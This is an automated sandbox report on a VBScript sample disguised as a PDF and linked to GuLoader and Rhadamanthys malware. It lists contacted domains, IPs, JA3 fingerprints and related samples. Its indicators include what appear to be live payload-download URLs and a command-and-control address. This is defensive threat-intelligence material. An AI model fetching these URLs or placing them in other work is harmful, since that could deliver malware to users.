
                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        List of required items and services.pdf.vbs0%ReversingLabs

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://tdejb.com0%Avira URL Cloudsafe
                        http://purl.oclc.org/ooxml/officeDocument/extendedProperties0%Avira URL Cloudsafe
                        http://st.co0%Avira URL Cloudsafe
                        https://www.tdejb.com/ef/Skifterne.sea0%Avira URL Cloudsafe
                        http://purl.oclc.org/ooxml/officeDocument/extendedPropertiespro0%Avira URL Cloudsafe
                        http://purl.oclc.org/ooxml/wordprocessingml/mainw0%Avira URL Cloudsafe
                        http://www.astenterprises.com.pk0%Avira URL Cloudsafe
                        https://www.astenterprises.com.pk/ef/ef.vbs0%Avira URL Cloudsafe
                        http://www.tdejb.com0%Avira URL Cloudsafe
                        http://purl.oclc.org/ooxml/officeDocument/relationships/officeDocument0%Avira URL Cloudsafe
                        http://purl.oclc.org/ooxml/wordprocessingml/mainWiw=0%Avira URL Cloudsafe
                        http://astenterprises.com.pk0%Avira URL Cloudsafe
                        https://www.astenterprises.com.pk0%Avira URL Cloudsafe
                        http://purl.oclc.org/ooxml/officeDocument/docPropsVTypes0%Avira URL Cloudsafe
                        https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx0%Avira URL Cloudsafe
                        https://www.fornid.com/lm/List0%Avira URL Cloudsafe
                        https://87.120.127.215:3847/6d41b386417b9c328d8/i4rtpd4n.psnut0%Avira URL Cloudsafe
                        https://www.tdejb.com/ef/ef.bin0%Avira URL Cloudsafe
                        https://www.arecosaldature.it/ef/Skifterne.sea0%Avira URL Cloudsafe
                        https://www.tdejb.com0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ntp.nict.jp
                        		133.243.238.163
                        		truefalse
                          		high
                          gbg1.ntp.netnod.se
                          		194.58.203.20
                          		truefalse
                            		unknown
                            x.ns.gin.ntt.net
                            		129.250.35.250
                            		truefalse
                              		high
                              astenterprises.com.pk
                              		107.161.23.150
                              		truetrue
                                		unknown
                                fornid.com
                                		93.95.216.175
                                		truefalse
                                  		high
                                  ntp1.net.berkeley.edu
                                  		169.229.128.134
                                  		truefalse
                                    		high
                                    tdejb.com
                                    		202.71.109.228
                                    		truefalse
                                      		unknown
                                      time-a-g.nist.gov
                                      		129.6.15.28
                                      		truefalse
                                        		high
                                        ts1.aco.net
                                        		193.171.23.163
                                        		truefalse
                                          		unknown
                                          ntp1.hetzner.de
                                          		213.239.239.164
                                          		truefalse
                                            		high
                                            gbg1.ntp.se
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.fornid.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                www.astenterprises.com.pk
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.tdejb.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://www.tdejb.com/ef/Skifterne.seafalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.astenterprises.com.pk/ef/ef.vbstrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.tdejb.com/ef/ef.binfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docxtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3118863696.0000023D91B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2988265247.0000023D833C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3118863696.0000023D919FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://purl.oclc.org/ooxml/officeDocument/extendedPropertiespowershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://purl.oclc.org/ooxml/officeDocument/extendedPropertiespropowershell.exe, 00000001.00000002.3137535140.0000023D99ADC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tdejb.compowershell.exe, 00000006.00000002.1929100523.0000020181C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://go.micropowershell.exe, 00000001.00000002.2988265247.0000023D825AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180BBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tdejb.compowershell.exe, 00000006.00000002.1929100523.0000020181C6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://st.copowershell.exe, 00000006.00000002.1956381312.00000201E8542000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.ver)svchost.exe, 0000000F.00000002.2993557026.0000012632E00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000F.00000003.2038947683.00000126330A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2038947683.00000126330F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.fornid.compowershell.exe, 00000001.00000002.2988265247.0000023D82F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://purl.oclc.org/ooxml/officeDocument/relationships/officeDocumentpowershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://purl.oclc.org/ooxml/wordprocessingml/mainwpowershell.exe, 00000001.00000002.3137535140.0000023D99A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fornid.compowershell.exe, 00000001.00000002.2988265247.0000023D83336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.2988265247.0000023D82F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000F.00000003.2038947683.000001263311A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://astenterprises.com.pkpowershell.exe, 00000001.00000002.2988265247.0000023D82F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://purl.oclc.org/ooxml/wordprocessingml/mainWiw=powershell.exe, 00000001.00000002.3137535140.0000023D99A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.2988265247.0000023D825AC000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.micropowershell.exe, 00000001.00000002.3143149575.0000023D99D0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://purl.oclc.org/ooxml/officeDocument/docPropsVTypespowershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://aka.ms/pscore6lBfqpowershell.exe, 0000000B.00000002.2160349963.0000000004A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contoso.com/powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3118863696.0000023D91B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2988265247.0000023D833C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3118863696.0000023D919FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://87.120.127.215:3847/6d41b386417b9c328d8/i4rtpd4n.psnutsvchost.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.2988265247.0000023D81981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2988265247.0000023D81981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160349963.0000000004A31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.arecosaldature.it/ef/Skifterne.seapowershell.exe, 00000006.00000002.1929100523.0000020181790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160349963.0000000004B85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.fornid.com/lm/Listpowershell.exe, 00000001.00000002.2988265247.0000023D82F9A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.tdejb.compowershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.00000201817C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://fornid.compowershell.exe, 00000001.00000002.2988265247.0000023D83336000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                194.58.203.20
                                                                                                		gbg1.ntp.netnod.seSweden
                                                                                                		57021NTP-SEAnycastedNTPservicesfromNetnodIXPsSEfalse
                                                                                                169.229.128.134
                                                                                                		ntp1.net.berkeley.eduUnited States
                                                                                                		25UCBUSfalse
                                                                                                129.6.15.28
                                                                                                		time-a-g.nist.govUnited States
                                                                                                		49US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSfalse
                                                                                                193.171.23.163
                                                                                                		ts1.aco.netAustria
                                                                                                		1853ACONETACOnetBackboneATfalse
                                                                                                87.120.127.215
                                                                                                		unknownBulgaria
                                                                                                		25206UNACS-AS-BG8000BurgasBGtrue
                                                                                                202.71.109.228
                                                                                                		tdejb.comMalaysia
                                                                                                		17971TMVADS-APTM-VADSDCHostingMYfalse
                                                                                                213.239.239.164
                                                                                                		ntp1.hetzner.deGermany
                                                                                                		24940HETZNER-ASDEfalse
                                                                                                107.161.23.150
                                                                                                		astenterprises.com.pkUnited States
                                                                                                		3842RAMNODEUStrue
                                                                                                129.250.35.250
                                                                                                		x.ns.gin.ntt.netUnited States
                                                                                                		2914NTT-COMMUNICATIONS-2914USfalse
                                                                                                133.243.238.163
                                                                                                		ntp.nict.jpJapan9355NICTNationalInstituteofInformationandCommunicationsTefalse
                                                                                                45.149.241.141
                                                                                                		unknownGermany
                                                                                                		701UUNETUSfalse
                                                                                                239.255.255.250
                                                                                                		unknownReserved
                                                                                                		unknownunknownfalse
                                                                                                93.95.216.175
                                                                                                		fornid.comItaly
                                                                                                		52030SERVERPLAN-ASITfalse

                                                                                                Private

                                                                                                IP
                                                                                                127.0.0.1

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1577817
                                                                                                Start date and time:2024-12-18 19:25:14 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 11m 22s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:27
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:List of required items and services.pdf.vbs
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.expl.evad.winVBS@38/246@15/14
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 37.5%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 67%
                                                                                                • Number of executed functions: 196
                                                                                                • Number of non-executed functions: 17
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .vbs

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 2.20.68.201, 2.20.68.210, 52.109.89.18, 52.113.194.132, 52.109.76.243, 23.218.208.109, 52.111.252.15, 52.111.252.16, 52.111.252.17, 52.111.252.18, 52.182.141.63, 95.101.110.27, 95.101.110.24, 2.19.198.19, 23.32.239.26, 23.32.239.17, 23.32.239.73, 212.138.170.134, 172.217.21.35, 172.217.17.78, 64.233.162.84, 4.245.163.56, 20.190.177.148, 13.107.246.63
                                                                                                • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, clientservices.googleapis.com, a767.dspw65.akamai.net, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, neu-azsc-000.roaming.officeapps.live.com, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, pool.ntp.org, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1
                                                                                                • Execution Graph export aborted for target msiexec.exe, PID 5228 because there are no executed function
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 5232 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6216 because it is empty
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6904 because it is empty
                                                                                                • Execution Graph export aborted for target svchost.exe, PID 2188 because there are no executed function
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                • VT rate limit hit for: List of required items and services.pdf.vbs

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                13:26:07API Interceptor4497466x Sleep call for process: powershell.exe modified
                                                                                                13:26:13API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                                13:26:15API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                13:26:41API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                13:27:58API Interceptor1x Sleep call for process: wmprph.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                194.58.203.20HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                    ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                      download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        169.229.128.134H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                            wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                              129.6.15.28H3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                  payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                    wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                      Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                        mirai_nomiGet hashmaliciousMiraiBrowse
                                                                                                                          SecuriteInfo.com.Other.Malware-gen.28386.14039.elfGet hashmaliciousMiraiBrowse
                                                                                                                            SecuriteInfo.com.Other.Malware-gen.3200.4135.elfGet hashmaliciousMiraiBrowse
                                                                                                                              SecuriteInfo.com.Other.Malware-gen.31307.16494.elfGet hashmaliciousMiraiBrowse
                                                                                                                                SecuriteInfo.com.Linux.Siggen.6954.6684.13146.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  193.171.23.163wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                    202.71.109.228List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                        List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                          ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                            DOC-MARIANO _ 21ST_JUNE_2022 _.HTMGet hashmaliciousHTMLPhisherBrowse

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              ntp.nict.jpH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 133.243.238.243
                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 133.243.238.244
                                                                                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 61.205.120.130
                                                                                                                                              download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 133.243.238.243
                                                                                                                                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                              • 61.205.120.130
                                                                                                                                              gbg1.ntp.netnod.seHI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              x.ns.gin.ntt.netHI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 129.250.35.250
                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 129.250.35.250

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUSH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 129.6.15.28
                                                                                                                                              HI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 129.6.15.28
                                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                              • 129.6.84.228
                                                                                                                                              payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 129.6.15.28
                                                                                                                                              fbot.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                              • 129.6.93.244
                                                                                                                                              sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                              • 129.6.157.62
                                                                                                                                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                              • 129.6.15.28
                                                                                                                                              Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                                                                                              • 132.163.96.1
                                                                                                                                              T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                                                                                                              • 129.6.15.27
                                                                                                                                              T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                                                                                                              • 132.163.96.2
                                                                                                                                              NTP-SEAnycastedNTPservicesfromNetnodIXPsSEHI6VIJERUn.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 194.58.203.20
                                                                                                                                              regscs.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                              • 194.58.200.20
                                                                                                                                              PREVIOUS CONVERSATION.pdf.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                              • 194.58.200.20
                                                                                                                                              OUTSTANDING_DEBTS.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                              • 194.58.200.20
                                                                                                                                              NEW PURCHASE ORDER.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                              • 194.58.200.20
                                                                                                                                              STATEMENT OF ACCOUNT.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                              • 194.58.200.20
                                                                                                                                              Banking_cordinates_928273.exeGet hashmaliciousWebMonitor RATBrowse
                                                                                                                                              • 194.58.200.20
                                                                                                                                              UCBUSH3G7Xu6gih.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                              • 169.229.128.134
                                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                              • 169.229.133.17
                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              • 169.229.128.134
                                                                                                                                              home.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                              • 169.229.176.114
                                                                                                                                              m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                              • 136.152.48.193
                                                                                                                                              wE1inOhJA5.msiGet hashmaliciousRemcos, RHADAMANTHYSBrowse
                                                                                                                                              • 169.229.128.134
                                                                                                                                              xd.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 169.229.176.118
                                                                                                                                              wZU2edEGL3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 136.152.38.2
                                                                                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 128.32.7.69
                                                                                                                                              la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 128.32.229.224

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttp://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onionGet hashmaliciousUnknownBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 107.161.23.150
                                                                                                                                              • 202.71.109.228
                                                                                                                                              • 93.95.216.175
                                                                                                                                              37f463bf4616ecd445d4a1937da06e19solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              InstallSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              z68scancopy.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                              • 202.71.109.228
                                                                                                                                              oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                              • 202.71.109.228
